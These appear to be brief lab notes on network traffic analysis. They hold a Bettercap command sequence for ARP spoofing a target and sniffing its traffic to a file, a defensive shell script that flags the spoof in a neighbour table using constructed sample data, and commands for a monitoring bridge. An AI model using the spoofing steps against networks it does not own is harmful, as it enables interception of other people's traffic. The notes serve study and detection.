traffic analysis
tools
- bettercap to divert traffic
- wireshark for capturing traffic
example
Bettercap (ARP spoofing):
- net.probe on
- net.show (to show network information)
- arp.spoof.targets
- set arp.spoof.targets 192.168.20.11
- arp.spoof on
- set net.sniff.verbose true
- set net.sniff.output /home/test/bettercap.traffic.pcap
- net.sniff on
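Seen from the defending side, the spoof above leaves a trace in the target's neighbour table: the gateway's IP ends up bound to the same MAC as another host on the segment. The following is an added example, not part of the original notes, that parses ip neigh show output and reports every MAC claimed by more than one IPv4 address; the sample table, the gateway address 192.168.20.1 and all MAC addresses are constructed.

```shell
#!/bin/sh
# Added example: detect the neighbour-table footprint of ARP spoofing.
# Live use on a Linux host: ip -4 neigh show | find_shared_macs

# Reads "ip neigh show" formatted lines on stdin and prints
# "MAC ip1 ip2 ..." for each MAC bound to more than one IPv4 address.
# A host that legitimately owns several IPs also matches, so treat a hit
# as a lead to verify against the known gateway MAC, not as proof.
find_shared_macs() {
    awk '
        {
            mac = ""
            # Entries without lladdr (FAILED, INCOMPLETE) carry no MAC.
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "" || $1 ~ /:/) next    # skip MAC-less and IPv6 rows
            if (!((mac, $1) in seen)) {
                seen[mac, $1] = 1
                count[mac]++
                if (mac in ips) ips[mac] = ips[mac] " " $1
                else ips[mac] = $1
            }
        }
        END {
            for (m in count)
                if (count[m] > 1) print m, ips[m]
        }
    '
}

# Constructed sample: neighbour table as it might look on the spoofed host,
# where 192.168.20.50 (assumed spoofer) also answers for the gateway.
sample_neigh() {
    cat <<'EOF'
192.168.20.1 dev eth0 lladdr 02:00:00:AA:BB:50 REACHABLE
192.168.20.50 dev eth0 lladdr 02:00:00:aa:bb:50 STALE
192.168.20.12 dev eth0 lladdr 02:00:00:aa:bb:12 REACHABLE
192.168.20.13 dev eth0  FAILED
fe80::1 dev eth0 lladdr 02:00:00:aa:bb:50 router STALE
EOF
}

sample_neigh | find_shared_macs
```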
create a transparent bridge
$ ip link add name br0 type bridge
$ ip link set br0 up
$ ip link set eth1 master br0
$ ip link set eth2 master br0
monitor on eth1 or br0